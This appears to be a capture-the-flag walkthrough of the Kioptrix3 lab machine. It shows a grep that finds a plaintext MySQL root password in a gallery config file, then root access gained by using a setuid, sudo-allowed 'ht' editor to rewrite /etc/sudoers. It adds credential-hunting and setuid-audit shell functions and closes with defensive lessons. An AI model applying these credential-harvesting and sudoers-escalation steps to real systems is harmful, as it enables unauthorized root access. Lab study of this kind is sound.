/usr/share/phpmyadmin/server_privileges.php:656:       . $spaces . '<label for="select_pred_password">' . "\n"
/usr/share/phpmyadmin/server_privileges.php:660:       . $spaces . '    <select name="pred_password" id="select_pred_password" title="' . $GLOBALS['strPassword'] . '"' . "\n"
/usr/share/phpmyadmin/server_privileges.php:671:       . $spaces . '<input type="password" id="text_pma_pw" name="pma_pw" title="' . $GLOBALS['strPassword'] . '" onchange="pred_password.value = \'userdefined\';" />' . "\n"
/usr/share/phpmyadmin/server_privileges.php:678:       . $spaces . '<input type="password" name="pma_pw2" id="text_pma_pw2" title="' . $GLOBALS['strReType'] . '" onchange="pred_password.value = \'userdefined\';" />' . "\n"
/usr/share/phpmyadmin/server_privileges.php:681:       . $spaces . '<label for="button_generate_password">' . "\n"
/usr/share/phpmyadmin/server_privileges.php:685:       . $spaces . '    <input type="button" id="button_generate_password" value="' . $GLOBALS['strGenerate'] . '" onclick="suggestPassword()" />' . "\n"
/usr/share/phpmyadmin/server_privileges.php:686:       . $spaces . '    <input type="button" id="button_copy_password" value="' . $GLOBALS['strCopy'] . '" onclick="suggestPasswordCopy(this.form)" />' . "\n"
/usr/share/phpmyadmin/server_privileges.php:712:        // uses $password
/usr/share/phpmyadmin/server_privileges.php:713:        if (!isset($password) && isset($Password)) {
/usr/share/phpmyadmin/server_privileges.php:714:            $password=$Password;
/usr/share/phpmyadmin/server_privileges.php:773:        if ($pred_password != 'none' && $pred_password != 'keep') {
/usr/share/phpmyadmin/server_privileges.php:782:            if ($pred_password == 'keep' && !empty($password)) {
/usr/share/phpmyadmin/server_privileges.php:783:                $real_sql_query .= ' IDENTIFIED BY PASSWORD \'' . $password . '\'';
/usr/share/phpmyadmin/server_privileges.php:785:                    $create_user_real .= ' IDENTIFIED BY PASSWORD \'' . $password . '\'';
/usr/share/phpmyadmin/server_privileges.php:866:            // we put the query containing the hidden password in
/usr/share/phpmyadmin/server_privileges.php:1093: * Updates the password
/usr/share/phpmyadmin/server_privileges.php:1096:    // similar logic in user_password.php
/usr/share/phpmyadmin/server_privileges.php:1114:        // in $sql_query which will be displayed, hide the password
/usr/share/phpmyadmin/server_privileges.php:1220:        // when there is a query containing a hidden password, take it
/usr/share/phpmyadmin/server_privileges.php:1921:            require_once './libraries/display_change_password.lib.php';
/usr/share/phpmyadmin/config.sample.inc.php:14: * This is needed for cookie based authentication to encrypt password in
/usr/share/phpmyadmin/scripts/setup.php:708: *                  'password' means password input.
/usr/share/phpmyadmin/scripts/setup.php:735:            } elseif ($val[3] == 'password') {
/usr/share/phpmyadmin/scripts/setup.php:736:                $type = 'password';
/usr/share/phpmyadmin/scripts/setup.php:741:            case 'password':
/usr/share/phpmyadmin/scripts/setup.php:827:            array('Show password change form', 'ShowChgPassword', 'Whether to show form for changing password, this does not limit ability to execute the same command directly', FALSE),
/usr/share/phpmyadmin/scripts/setup.php:1007:            array('Password for config auth', 'password', 'Leave empty if not using config auth', 'password'),
/usr/share/phpmyadmin/scripts/setup.php:1011:            array('phpMyAdmin control user password', 'controlpass', 'Password for user which phpMyAdmin can use for various actions', 'password'),
/usr/share/phpmyadmin/scripts/setup.php:1351:            $new_server = grab_values('host;extension;port;socket;connect_type;compress:bool;controluser;controlpass;auth_type;user;password;only_db;verbose;pmadb;bookmarktable:serialized;relation:serialized;table_info:serialized;table_coords:serialized;pdf_pages:serialized;column_info:serialized;designer_coords:serialized;history:serialized;AllowDeny:serialized;SignonSession;SignonURL;LogoutURL');
/usr/share/phpmyadmin/scripts/setup.php:1388:                    message('error', 'Empty phpMyAdmin control user password while using pmadb!');
/usr/share/phpmyadmin/scripts/setup.php:1423:                unset($new_server['password']);
/usr/share/phpmyadmin/scripts/setup.php:1964:            message('warning', 'You are not using secure connection, all data (including sensitive, like passwords) are transfered unencrypted!' . $redir, 'Not secure connection');
/usr/share/phpmyadmin/phpmyadmin.css.php:611:li#li_change_password {
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:28:$strAccessDeniedExplanation = 'phpMyAdmin ha provato a connettersi al server MySQL, e il server ha rifiutato la connessione. Si dovrebbe controllare il nome dell\'host, l\'username e la password nel file config.inc.php ed assicurarsi che corrispondano alle informazioni fornite dall\'amministratore del server MySQL.';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:131:$strChangePassword = 'Cambia password';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:380:$strInsecureMySQL = 'Il file di configurazione in uso contiene impostazioni (root con nessuna password) che corrispondono ai privilegi dell\'account MySQL predefinito. Un server MySQL funzionante con queste impostazioni è aperto a intrusioni, e si dovrebbe realmente riparare a questa falla nella sicurezza.';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:410:$strKeepPass = 'Non cambiare la password';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:549:$strPasswordChanged = 'La password per l\'utente %s è cambiata con successo.';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:550:$strPasswordEmpty = 'La password è vuota!';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:552:$strPasswordNotSame = 'La password non coincide!';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:704:$strSecretRequired = 'Adesso c\'è bisogno di una password per il file di configurazione (blowfish_secret).';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:1021:$strWrongUser = 'Nome utente o password errati. Accesso negato.';
/usr/share/phpmyadmin/lang/norwegian-utf-8.inc.php:26:$strAccessDeniedExplanation = 'phpMyAdmin forsøkte å koble til MySQL-serveren, og serveren avviste tilkoblingen. Du må kontrollere vert (host), brukernavn (username) og passord (password) i config.inc.php og sjekke at de tilsvarer den informasjonen du fikk fra MySQL-server administratoren.';
/usr/share/phpmyadmin/lang/persian-utf-8.inc.php:350:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.'; //to translate
/usr/share/phpmyadmin/lang/thai-utf-8.inc.php:600:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';  //to translate
/usr/share/phpmyadmin/lang/hindi-utf-8.inc.php:272:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';  //to translate
/usr/share/phpmyadmin/lang/hindi-utf-8.inc.php:483:$strInsecureMySQL = 'Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.';  //to translate
/usr/share/phpmyadmin/lang/hindi-utf-8.inc.php:608:$strPasswordEmpty = 'The password is empty!'; //to translate
/usr/share/phpmyadmin/lang/hindi-utf-8.inc.php:610:$strPasswordNotSame = 'The passwords aren\'t the same!'; //to translate
/usr/share/phpmyadmin/lang/albanian-utf-8.inc.php:271:$strInsecureMySQL = 'File i konfigurimit në përdorim përmban zgjedhje (root pa asnjë password) që korrispondojnë me të drejtat e account MySQL të paracaktuar. Një server MySQL funksionues me këto zgjedhje është i pambrojtur ndaj sulmeve, dhe ju duhet patjetër të korrigjoni këtë vrimë në siguri.';
/usr/share/phpmyadmin/lang/georgian-utf-8.inc.php:360:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';  //to translate
/usr/share/phpmyadmin/lang/georgian-utf-8.inc.php:552:$strInsecureMySQL = 'Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.';  //to translate
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:28:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:131:$strChangePassword = 'Change password';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:380:$strInsecureMySQL = 'Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:410:$strKeepPass = 'Do not change the password';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:549:$strPasswordChanged = 'The password for %s was changed successfully.';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:550:$strPasswordEmpty = 'The password is empty!';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:552:$strPasswordNotSame = 'The passwords aren\'t the same!';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:1021:$strWrongUser = 'Wrong username/password. Access denied.';
/usr/share/phpmyadmin/lang/azerbaijani-utf-8.inc.php:603:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';  //to translate
/usr/share/phpmyadmin/lang/afrikaans-utf-8.inc.php:385:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';  //to translate
/usr/share/phpmyadmin/lang/afrikaans-utf-8.inc.php:563:$strInsecureMySQL = 'Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.';  //to translate
/usr/share/phpmyadmin/lang/ukrainian-utf-8.inc.php:22:$strAccessDeniedExplanation = 'phpMyAdmin спробував з\'єднатися з MySQL сервером, але сервер не дозволив під\'єднання. Прошу перевірити значення host, username та password у файлі config.inc.php та впевнитися, що вони відповідають даним отриманим Вами від адміністратора MySQL сервера.';
/usr/share/phpmyadmin/lang/korean-utf-8.inc.php:442:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';  //to translate
/usr/share/phpmyadmin/lang/sinhala-utf-8.inc.php:30:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';
/usr/share/phpmyadmin/lang/sinhala-utf-8.inc.php:354:$strInsecureMySQL = 'Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.';
/usr/share/phpmyadmin/lang/sinhala-utf-8.inc.php:517:$strPasswordChanged = 'The password for %s was changed successfully.';
/usr/share/phpmyadmin/lang/sinhala-utf-8.inc.php:518:$strPasswordEmpty = 'The password is empty!';
/usr/share/phpmyadmin/lang/sinhala-utf-8.inc.php:520:$strPasswordNotSame = 'The passwords aren\'t the same!';
/usr/share/phpmyadmin/lang/malay-utf-8.inc.php:440:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';  //to translate
/usr/share/phpmyadmin/lang/french-utf-8.inc.php:25:$strAccessDeniedExplanation = 'phpMyAdmin a tenté de se connecter au serveur MySQL, et le serveur a rejeté la connexion. Veuillez vérifier les valeurs de "host", "username" et "password" dans votre configuration et vous assurer qu\'elles correspondent aux informations fournies par l\'administrateur du serveur MySQL.';
/usr/share/phpmyadmin/main.php:44:    // password if the configuration permits
/usr/share/phpmyadmin/main.php:203:     * Change password
/usr/share/phpmyadmin/main.php:208:        PMA_printListItem($strChangePassword, 'li_change_password',
/usr/share/phpmyadmin/main.php:209:            './user_password.php?' . $common_url_query);
/usr/share/phpmyadmin/main.php:343: && $cfg['Server']['password'] == '') {
/etc/phpmyadmin/config.inc.php:10: * NOTE: do not add security sensitive data to this file (like passwords)
/home/www/kioptrix3.com/gallery/gfunctions.php:11:                                    $GLOBALS["gallarific_mysql_password"])
/home/www/kioptrix3.com/gallery/gfunctions.php:583:        $password = escape($_POST["password"]);
/home/www/kioptrix3.com/gallery/gfunctions.php:679:            $query = sprintf("insert into gallarific_users(username, password, usertype, firstname, lastname, email, datejoined, website, issuperuser, photo, joincode) values('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s')", $username, $password, "normaluser", $firstname, $lastname, $email, time(), $website, 0, $photo_file, $join_code);
/home/www/kioptrix3.com/gallery/gfunctions.php:771:        if(isset($_POST["gusername"]) && isset($_POST["gpassword"])) {
/home/www/kioptrix3.com/gallery/gfunctions.php:773:            $password = escape($_POST["gpassword"]);
/home/www/kioptrix3.com/gallery/gfunctions.php:774:            $query = sprintf("select * from gallarific_users where username='%s' and password='%s'", $username, $password);
/home/www/kioptrix3.com/gallery/gfunctions.php:794:                $error = "Your username or password is incorrect. Please login again.";
/home/www/kioptrix3.com/gallery/gfunctions.php:799:            $error = "Your username or password is incorrect. Please login again.";
/home/www/kioptrix3.com/gallery/gfunctions.php:857:        $password = escape($_POST["password"]);
/home/www/kioptrix3.com/gallery/gfunctions.php:946:            $query = sprintf("update gallarific_users set password='%s', firstname='%s', lastname='%s', email='%s', website='%s' where userid='%d'", $password, $firstname, $lastname, $email, $website, $user_id);
/home/www/kioptrix3.com/gallery/gfunctions.php:948:            $query = sprintf("update gallarific_users set password='%s', firstname='%s', lastname='%s', email='%s', website='%s', photo='%s' where userid='%d'", $password, $firstname, $lastname, $email, $website, $photo_file, $user_id);
/home/www/kioptrix3.com/gallery/gconfig.php:20:	$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
/home/www/kioptrix3.com/gallery/gconfig.php:24:if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ 

Grepping for the word password in .php files turns up the password fuckeyou in gconfig.php under /home/www/kioptrix3.com/gallery/ (the two gconfig.php hits at the end of the listing; almost everything above them is phpMyAdmin library code, configuration defaults and translation strings that merely contain the word). Reading the file shows that fuckeyou is the password of the MySQL root user, which the Gallarific gallery application uses to connect to its database. It is not the operating system's root credential: trying it with su root produces "Authentication failure". Note in passing that the application connects to MySQL as root rather than as a dedicated low-privilege database user, which is a least-privilege failure on its own.

loneferret@Kioptrix3:~$ cd /home/www/kioptrix3.com/gallery/
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery$ ls -l
total 156
drwxr-xr-x 2 root root  4096 2011-04-12 16:24 BACK
-rw-r--r-- 1 root root  3573 2009-10-10 15:43 db.sql
drwxr-xr-x 3 root root  4096 2011-04-12 13:14 gadmin
-rw-r--r-- 1 root root   214 2011-04-12 15:15 gallery.php
-rw-r--r-- 1 root root  1440 2011-04-14 11:32 gconfig.php
-rw-r--r-- 1 root root   297 2011-04-12 19:26 gfooter.php
-rw-r--r-- 1 root root 38771 2011-04-12 15:19 gfunctions.php
-rw-r--r-- 1 root root  1009 2011-04-12 15:11 gheader.php
-rw-r--r-- 1 root root   252 2011-04-12 15:10 g.php
-rw-r--r-- 1 root root   249 2011-04-12 15:03 index.php
-rw-r--r-- 1 root root 10340 2011-04-12 15:21 install.BAK
-rw-r--r-- 1 root root   212 2011-04-12 16:24 login.php
-rw-r--r-- 1 root root   213 2011-04-12 15:13 logout.php
drwxrwxrwx 2 root root  4096 2011-04-12 21:21 photos
-rw-r--r-- 1 root root   213 2011-04-12 15:20 photos.php
-rw-r--r-- 1 root root   219 2011-04-12 15:16 post_comment.php
-rw-r--r-- 1 root root   249 2011-04-12 15:14 p.php
-rw-r--r-- 1 root root   214 2011-04-12 15:58 profile.php
-rw-r--r-- 1 root root    87 2009-10-10 15:44 readme.html
-rw-r--r-- 1 root root   213 2011-04-12 15:17 recent.php
-rw-r--r-- 1 root root   215 2011-04-12 16:21 register.php
drwxr-xr-x 2 root root  4096 2011-04-13 04:24 scopbin
-rw-r--r-- 1 root root   213 2011-04-12 16:23 search.php
-rw-r--r-- 1 root root   216 2011-04-12 15:22 slideshow.php
-rw-r--r-- 1 root root   211 2011-04-12 15:18 tags.php
drwxr-xr-x 6 root root  4096 2011-04-12 13:14 themes
-rw-r--r-- 1 root root    56 2009-10-10 16:23 version.txt
-rw-r--r-- 1 root root   211 2011-04-12 15:23 vote.php
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery$ 
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery$ cat gconfig.php 
<?php
	error_reporting(0);
	/*
		A sample Gallarific configuration file. You should edit
		the installer details below and save this file as gconfig.php
		Do not modify anything else if you don't know what it is.
	*/

	// Installer Details -----------------------------------------------

	// Enter the full HTTP path to your Gallarific folder below,
	// such as http://www.yoursite.com/gallery
	// Do NOT include a trailing forward slash

	$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

	$GLOBALS["gallarific_mysql_server"] = "localhost";
	$GLOBALS["gallarific_mysql_database"] = "gallery";
	$GLOBALS["gallarific_mysql_username"] = "root";
	$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

	// Setting Details -------------------------------------------------

if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
		echo("A connection to the database couldn't be established: " . mysql_error());
		die();
}else {
	if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
		echo("The Gallarific database couldn't be opened: " . mysql_error());
		die();
	}else {
		$settings=mysql_query("select * from gallarific_settings");
		if(mysql_num_rows($settings)!=0){
			while($data=mysql_fetch_array($settings)){
				$GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
			}
		}
	
	}
}

?>
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery$ 
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery$ 
loneferret@Kioptrix3:~$ id
uid=1000(loneferret) gid=100(users) groups=100(users)
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ su root
Password: 
su: Authentication failure
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ 
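The credential hunt above worked, but most of its output was noise from phpMyAdmin documentation and language files. The following is an added example, not code from the original write-up, of a more selective version of the same technique: it searches config-style files, matches only lines that assign a non-empty literal to a key whose name contains password, passwd or pwd, skips translation directories and comment lines, and therefore surfaces the gconfig.php-style hit without the strings that merely mention the word. The sample tree it is tested against is constructed here (the file names imitate what the listing above shows; the secret values are placeholders), and the file-extension list and the lang/locale exclusions are assumptions a practitioner would tune per target.

```shell
#!/bin/sh
# Added example (not from the original write-up): hunt for hard-coded
# credentials in config-style files while filtering the documentation and
# language-string noise that a bare "grep password" produces.

# hunt_creds [ROOT] [DEPTH]
# Prints file:line:content for lines that assign a non-empty literal to a
# key containing password/passwd/pwd. Comment lines are dropped. The
# extension list and the lang/locale exclusions are assumptions; tune them.
hunt_creds() {
    root="${1:-/}"
    depth="${2:-6}"
    # PHP/JSON/YAML style:  ...password"] = "value"   password => 'value'   password: "value"
    quoted="(password|passwd|pwd)[]\"']*[[:space:]]*(=|=>|:)[[:space:]]*[\"'][^\"']+[\"']"
    # ini/.env style, key at line start, unquoted value:  db_password = value
    bare='^[[:space:]]*[A-Za-z0-9_.-]*(password|passwd|pwd)[A-Za-z0-9_.-]*[[:space:]]*=[[:space:]]*[^[:space:]]+'
    find "$root" -maxdepth "$depth" -type f \
        \( -name '*.php' -o -name '*.inc' -o -name '*.ini' -o -name '*.conf' \
           -o -name '*.cnf' -o -name '*.yml' -o -name '*.yaml' -o -name '.env' \) \
        ! -path '*/lang/*' ! -path '*/locale/*' \
        -exec grep -HnEi -e "$quoted" -e "$bare" {} + 2>/dev/null |
    grep -Ev '^[^:]*:[0-9]+:[[:space:]]*(//|#|\*|/\*)'
}

# Constructed sample tree: imitates the Gallarific config and the phpMyAdmin
# defaults/language strings seen in the listing, plus an ini-style config.
# Secrets are placeholders. Prints the tree's path.
make_sample_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/home/www/site/gallery" "$t/usr/share/pma/lang" "$t/etc/app"
    printf '%s\n' '<?php' \
        '$GLOBALS["gallarific_mysql_password"] = "example-db-pass";' \
        '$password = escape($_POST["password"]);' \
        '// $GLOBALS["old_password"] = "commented-out";' \
        > "$t/home/www/site/gallery/gconfig.php"
    printf '%s\n' '<?php' \
        "\$cfg['Servers'][\$i]['password'] = '';" \
        "\$strPasswordEmpty = 'The password is empty!';" \
        > "$t/usr/share/pma/config.default.php"
    printf '%s\n' "\$strWrongUser = 'Wrong username/password. Access denied.';" \
        > "$t/usr/share/pma/lang/english-utf-8.inc.php"
    printf '%s\n' '[database]' 'user = app' 'db_password = Sup3r!' \
        > "$t/etc/app/app.conf"
    printf '%s' "$t"
}

# Usage on the constructed tree (on a live host: hunt_creds / 5):
tree=$(make_sample_tree)
hunt_creds "$tree"
rm -rf "$tree"
```

On the sample tree only two lines survive: the gconfig.php assignment and the ini-style db_password line. The empty phpMyAdmin default, the form-handling code that reads $_POST["password"], the language string and the commented-out assignment are all dropped, which is the difference between reading 140 lines of output and reading two.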


Looking further, we find something interesting in loneferret's home directory: a file named CompanyPolicy.README. It states that the Lead Programmer (loneferret) must use a program called "ht" to create, view and edit files, and that using anything else will get the employee fired. Note the exact wording of the policy: the instruction is to run 'sudo ht', which tells us before we even look at the sudo configuration that this account is allowed to run the editor as root. Observe the following commands:

loneferret@Kioptrix3:~$ ls -l
total 32
-rwxrwxr-x 1 root root 26275 2011-01-12 10:45 checksec.sh
-rw-r--r-- 1 root root   224 2011-04-16 08:51 CompanyPolicy.README
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ cat CompanyPolicy.README 
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ sudo ht        
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$ 


Running "ht" fails with a terminal error: the old box has no terminfo entry for the xterm-256color terminal type our client advertises. The workaround is simply export TERM=xterm, after which "ht" (the HT hex/text editor) starts normally. Two things then make this program a privilege-escalation lever. First, the policy file told us loneferret may run it via sudo, so it executes as root by design; running sudo -l is the standard check that confirms which commands an account may run as root and whether a password is required. Second, the binary itself carries the setuid and setgid bits (the s in both rws and r-s below) and is owned by root, so even without sudo it would run with root's effective privileges. A root-privileged interactive editor is as good as a root shell: whatever it can open, it can rewrite. The program's permissions are as follows:

loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ find / -name ht 2>/dev/null
/usr/local/bin/ht
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ ls -l /usr/local/ht
ls: cannot access /usr/local/ht: No such file or directory
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ ls -l /usr/local/bin/ht
-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ 
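Finding "ht" here relied on the policy file pointing at it. The more general check, on either side of an engagement, is to enumerate every setuid/setgid file on the host and compare it against what the distribution ships. The function below is an added example, not part of the original write-up: it lists setuid and setgid files under a root directory, classifies the bits by parsing the ls -l mode string exactly as it appears above, flags binaries outside the standard system directories (where /usr/local/bin/ht would stand out), and, if given a baseline file of expected paths, flags anything not in it. The set of "standard" directories is an assumption; the test tree it runs against is constructed here.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit setuid/setgid files.

# suid_audit [ROOT] [BASELINE_FILE]
# Prints "<path> <setuid|setgid|setuid+setgid> <standard-path|nonstandard-path>[ not-in-baseline]"
# for every regular file under ROOT with the setuid or setgid bit set.
# Paths are printed relative to ROOT so that a mounted image audits the same
# way as a live host (ROOT=/). BASELINE_FILE lists one expected path per line.
# The list of "standard" directories is an assumption for this example.
suid_audit() {
    root="${1:-/}"
    baseline="${2:-}"
    root="${root%/}"
    [ -z "$root" ] && root=/
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort |
    while IFS= read -r path; do
        # Parse the mode string: position 4 is the owner-execute slot (s = setuid),
        # position 7 the group-execute slot (s = setgid), as in -rwsr-sr-x.
        mode=$(ls -ld "$path" | cut -c1-10)
        bits=""
        case "$mode" in ???[sS]*) bits="setuid" ;; esac
        case "$mode" in ??????[sS]*) bits="${bits:+$bits+}setgid" ;; esac
        case "$root" in /) rel="$path" ;; *) rel="${path#"$root"}" ;; esac
        loc="nonstandard-path"
        case "$rel" in
            /bin/*|/sbin/*|/usr/bin/*|/usr/sbin/*|/usr/lib/*|/usr/libexec/*) loc="standard-path" ;;
        esac
        known=""
        if [ -n "$baseline" ] && ! grep -qxF "$rel" "$baseline"; then
            known=" not-in-baseline"
        fi
        printf '%s %s %s%s\n' "$rel" "$bits" "$loc" "$known"
    done
}

# Usage on a live host, where a package manager's file list can serve as the baseline:
#   suid_audit / /root/suid-baseline.txt
```

Sorted output makes the list easy to diff between two runs, which is the cheap way to notice a freshly installed -rwsr-sr-x editor in /usr/local/bin. The parsing of the ls mode string is deliberately the same thing you do by eye when reading the listing above.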

The next step is therefore to run "ht" as root and edit /etc/sudoers, adding an entry that lets loneferret run /bin/sh as root. After that, sudo /bin/sh gives us a root shell. One caveat when doing this with an ordinary editor rather than visudo: sudoers is parsed strictly, and a syntax error makes sudo refuse every command for every user, which would close the very door we are using. Keep the added line minimal and, before leaving the editor, confirm the file still parses with visudo -c (or simply re-run sudo -l). The steps are shown in the following figures:

Gambar 6. Membuka file sudoers dengan program “ht”
Gambar 7. Menyunting file sudoers dengan menambahkan /bin/sh
Gambar 8. Meningkatkan hak akses menjadi root pada server Kioptrix3

Figures 6 through 8 show the attacker escalating to root and thereby taking complete control of the Kioptrix3 server.

Lessons Learned

The key lesson of this third Kioptrix chapter is that an attacker is "very hungry" for credentials. It began with a brute-force attack on the SSH service to obtain loneferret's credential. From there the attacker reached root, and with it the whole server, by abusing a program that runs with root privileges: "ht", installed setuid/setgid and whitelisted in sudo, turned a file-editing policy into a way to rewrite /etc/sudoers.

The root of the disaster was the weak password of loneferret, the newly hired Lead Programmer. On top of that, as the head of development he did not follow secure-coding practice: the MySQL administrator password was written in clear text into the application's configuration file, and the application connected to the database as MySQL root rather than as a dedicated, minimally privileged account. Finally, the company policy that mandated a root-privileged editor for everyday file editing handed an unprivileged user a direct path to root.

This is an important lesson for electronic system operators (Penyelenggara Sistem Elektronik): protect the credentials of the entire system, not only the administrator's, but every user's. An attacker moves laterally through ordinary accounts before finally seizing root.
